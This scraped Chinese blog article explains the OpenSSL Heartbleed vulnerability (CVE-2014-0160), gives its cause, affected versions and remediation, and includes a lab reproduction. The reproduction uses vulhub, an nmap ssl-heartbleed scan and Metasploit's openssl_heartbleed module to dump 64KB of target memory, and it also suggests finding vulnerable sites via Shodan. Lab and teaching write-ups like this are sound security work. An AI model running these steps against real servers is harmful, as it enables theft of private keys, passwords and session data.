当前位置: 首页 > news >正文

网站设计方案怎么写网站不备案可以做淘宝客吗

网站设计方案怎么写,网站不备案可以做淘宝客吗,云南最大的网络科技公司,响应式布局的缺点OpenSSL 心脏滴血漏洞(CVE-2014-0160) Openssl简介: 该漏洞在国内被译为OpenSSL心脏出血漏洞”#xff0c;因其破坏性之大和影响的范围之广#xff0c;堪称网络安全里程碑事件。 OpenSSL心脏滴血漏洞的大概原理是OpenSSL在2年前引入了心跳(hearbea0机制来维特TS链接的…OpenSSL 心脏滴血漏洞(CVE-2014-0160) Openssl简介: 该漏洞在国内被译为OpenSSL心脏出血漏洞”因其破坏性之大和影响的范围之广堪称网络安全里程碑事件。 OpenSSL心脏滴血漏洞的大概原理是OpenSSL在2年前引入了心跳(hearbea0机制来维特TS链接的长期存在心默机制是作为TLS的扩展实现但在代码中包括TLS (TCP)和DTLS(UDP)都没有做边界的检测所以导致攻击者可以利用这个漏洞来获得TS链接对端(可以是服务器也可以是客户端)内存中的一些数据至少可以获得16KB每次理论上讲最大可以获取64KB。 【事件规则】 OpenSSL“心脏出血”漏洞是一个非常严重的问题。这个漏洞使攻击者能够从内存中读取多达64 KB的数据。也就是说只要有这个漏洞的存在在无需任何特权信息或身份验证的环境下我们就可以从我们自己的测试机上偷来X.509证书的私钥、用户名与密码、聊天工具的消息、电子邮件以及重要的商业文档和通信等数据。 OpenSSL 心脏滴血漏洞分析 最初人们为了网络通信安全就开始使用安全协议进行加密通信SSLSecure Socket Layer就是一种安全协议。随着开源软件的流行有人写了一款叫 OpenSSL 的开源程序供大家方便地对通信进行SSL加密后来这款软件便在互联网中被广泛应用。我们在浏览器地址栏常见的 https 前缀的网址以及那把小锁图标通常就是指该网站经过 SSL 证书加密。 OpenSSL 有一个叫 Heartbeat 心跳检测的拓展问题就出在这个拓展上这也是漏洞被命名为“心脏出血”的直接原因。 所谓心跳检测就是建立一个 Client Hello 问询来检测对方服务器是不是正常在线 服务器发回 Server hello表明正常树立SSL通讯。就像我们打电话时会问对方 “喂听得到吗”一样。 每次问询都会附加一个问询的字符长度 pad lengthbug 来了如果这个 pad length 大于实际的长度服务器仍是会回来相同规模的字符信息于是形成了内存里信息的越界访问。 就这样每发起一个心跳服务器就能泄露一点点数据理论上最多泄露 64K这些数据里可能包括用户的登录账号密码、电子邮件甚至是加密秘钥等信息也可能并没有包含这些信息但攻击者可以不断利用 “心跳”来获取更多的信息。就这样服务器一点一点泄露越来越多的信息就像是心脏慢慢在出血心脏出血漏洞的名字由此而来。 由于互联网应用最广泛的安全传输方法就是 SSL而 Open SSL 又是多数 SSL 加密网站使用的开源软件包所以漏洞影响范围广大一时间席卷全球各个互联网相关领域网银、在线支付、电商网站、门户网站、电子邮件等无一幸免。 通过以上分析我们可以看见OpenSSL心脏出血漏洞(heartbleed)的产生主要由于OpenSSL的心跳处理逻辑没有检测心跳包中的长度字段是否和后续字段相吻合导致攻击者构造异常数据包来直接获取心跳数据所在的内存区域的后续数据。主要特征有 heartbleed漏洞主要存在于有心跳机制的OpenSSL协议中。IANA组织把开启心跳扩展机制的SSL数据包type类型定义为240x18。heartbleed漏洞主要存在于TLS和DTLS两种协议中在含有heartbleed漏洞的OpenSSL协议中需要开启心跳扩展机制beartbeat而含有心跳扩展机制的TLS版本主要包含在00x0301TLSv1.10x0302TLSv1.20x0303三种版本中。heartbleed漏洞攻击主要由于攻击者构造异常的心跳数据包即心跳包中的长度字段与后续的数据字段不相符合来获取心跳数据所在的内存区域的后续数据。 利用该漏洞攻击者可以远程读取服务器内存中64K的数据获取内存中的敏感信息。 漏洞描述 Heartbleed漏洞这项严重缺陷(CVE-2014-0160)的产生是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容这样一来受害者的内存内容就会以每次64KB的速度进行泄露。 漏洞原理 OpenSSL“心脏出血”漏洞的问题出现在openSSL处理TLS心跳的过程中TLS心跳的流程是A向B发送请求包B收到包后读取这个包的内容(data)并返回一个包含有请求包内容的响应包。请求包的内容(data)中包含有包的类型(type)和数据长度等信息。 当B收到A的请求包后并没有的验证A包的实际长度而是简单的把请求包data中说明的长度当作data的实际长度于是当请求包中说明的长度与请求包数据实际长度不同时问题就产生了。假设A构造一个请求包它的实际内容长度只有1而却告诉B的它的长度是65535那么B接受到这个包后就会把A的内容完全当作65535来处理其实到这里问题还并不严重最严重的问题出在心跳的响应包还需要附带请求包的全部内容这就需要程序做一次将请求包的数据从它所在的内存拷贝到响应包的内存里的操作。 这下就出大问题了当拷贝的时候程序认为A包的内容长度是65535个字节结果A包在内存里面实际只有1个字节于是程序不仅拷贝出了A包的内容还“傻傻”地将A包数据在内存中位置后额外的65534个字节拷贝进了响应包里并将这个响应包发还给了A于是A便轻易地获得了B内存中这65534个字节的数据。想象一下如果这65534个字节数据中包括一些敏感信息那么后果将非常严重。而且A还可以简单地通过连续的发送心跳包获取B机器内存中n个65534字节的数据这个漏洞不愧是2014年“最佳漏洞”。 影响版本 OpenSSL 1.0.1版本 漏洞利用 1使用shodan搜索引擎搜索站点 OpenSSL/1.0.1a 2打开Metasploit启动msf。然后使用 auxiliary/scanner/ssl/openssl_heart_bleed功能。 3执行run命令运行扫描器查看结果可以看到有Heartbeat response with leak的字样证明该站存在HeartBleed漏洞 4开启信息展示进行利用。 漏洞复现 一、环境搭建 环境介绍 靶机centos7 192.168.139.136 攻击机kali 192.168.139.129 确保两台测试机网络能通 环境搭建 使用dockervulhub搭建漏洞环境在centos7上搭建vulhub的步骤如下 使用dockervulhub搭建漏洞环境在centos7上搭建vulhub的步骤如下 1.安装docker依赖包 命令yum install -y yum-utils device-mapper-persistent-data lvm2 2.安装docker 命令yum install docker 3.启动docker页面没有显示 4. centos7下安装git 命令yum install -y git 5. 下载vulhub git clone 下载地址 命令git clone https://github.com/vulhub/vulhub.git 6.找到CVE-2014-0160并进入,输入命令docker-compose up -d运行漏洞环境 命令ls #查看所有漏洞目录 命令cd openssl #进入该目录 ls 命令docker-compose up -d #运行漏洞环境 7.查看运行情况 命令docker ps 复现过程 信息收集 使用Nmap进行扫描 命令nmap -sV -T4 192.168.139.136 使用Nmap漏洞扫描脚本对8443端口进行扫描检测如下 命令nmap -sV -p 8443 --script ssl-heartbleed.nse 192.168.139.136 使用MSF框架攻击 进入msfconsole 命令msfconsole 搜索相关漏洞模块 命令search heartbleed 使用攻击模块1 命令use auxiliary/scanner/ssl/openssl_heartbleed 查看配置参数 命令show options 配置参数 对required为yes但是current setting为空的项进行设置这里我们只需要设置rhosts靶机ip 命令set rhosts 192.168.139.136 #靶机ip set rport 8443 #设置端口 set verbose true #设置verbose为true是为了 看到泄露的信息 进行攻击 命令run 这里就可以看到 靶机的64KB信息了如果有人此时在登录web应用还可以直接抓到账号密码等信息。 修复方案 OpenSSL“心脏出血”漏洞CVE-2014-0160受影响的OpenSSL版本 OpenSSL 1.0.2-beta OpenSSL 1.0.1 - OpenSSL 1.0.1f 要解决此漏洞简单粗暴的方法就是升级openSSL软件。 建议服务器管理员或使用1.0.1g版或使用-DOPENSSL_NO_HEARTBEATS选项重新编译OpenSSL从而禁用易受攻击的功能直至可以更新服务器软件。 1.将受影响的服务器下线避免它继续泄露敏感信息。 2.停止旧版的 openssl 服务升级 openssl 到新版本并重新启动。 3.生成新密钥。因为攻击者可能通过漏洞获取私钥。将新密钥提交给你的CA获得新的认证之后在服务器上安装新密钥。 4.服务器上线。 5.撤销旧认证。 6.撤销现有的会话cookies。 7.要求用户修改密码。 Heartbleed 是在 8 年多前被发现并修补的然而许多服务器仍然存在 Heartbleed 漏洞
http://www.hkea.cn/news/14422797/

相关文章:

  • 一份完整的网站策划书网站后台传图片传不了
  • 网站编辑做seo好做吗上海公司网站备案
  • 如何识别html5网站广西代理网站建设公司
  • 怎么建个人公司网站深圳网站设计公司哪个好
  • 网站开发建设属于什么费用广州联亨科技网站建设
  • 网站建设 新闻网站 优化 分析
  • 西安小型企业网站建设wordpress 边栏插件
  • 深圳正规网站建设服务wordpress 制作主题
  • 重庆网站建设雪奥科技咨询公司招聘条件
  • 对于网站建设提出建议wordpress更换初始域名
  • 如网站站长如何对付黑客平面设计公司赚钱吗
  • 网站策划表实验中心网站建设的调查问卷
  • 网站模板组件中国建设银行绑定网站
  • 怎么编辑网站源代码赣州智美互联网科技有限公司
  • 建设一个新的网站需要准备什么个人网站怎么盈利
  • 东莞公司高端网站建设商城网站开发设计
  • 爱做的小说网站做水果网站需要多钱
  • 中小企业网站建设案例阿里云域名备案网站建设方案书
  • 焦作专业做网站公司哪家好什么网站可以做兼职赚钱吗
  • 网站自助建设推广wordpress userpro
  • 设计网站用什么语言代码写好了怎么做成网页
  • 德州力点科技 网站建设彩票系统开发搭建彩票网站服务器安全怎么做
  • 滨州正规网站建设公司互联网企业有哪些行业
  • 兖州城乡建设局网站个人域名怎么做网站
  • 内江网站怎么做seo网站备案免费的吗
  • 网站建设要求 牛商网实体店做网站有用吗
  • 网站开发招聘 领英成都免费网站制作
  • 网站套网站代码企业邮箱域名解析
  • 做网站傻瓜怎么设计自己logo
  • 建设银行贵金属网站关键词做网站标题是什么意思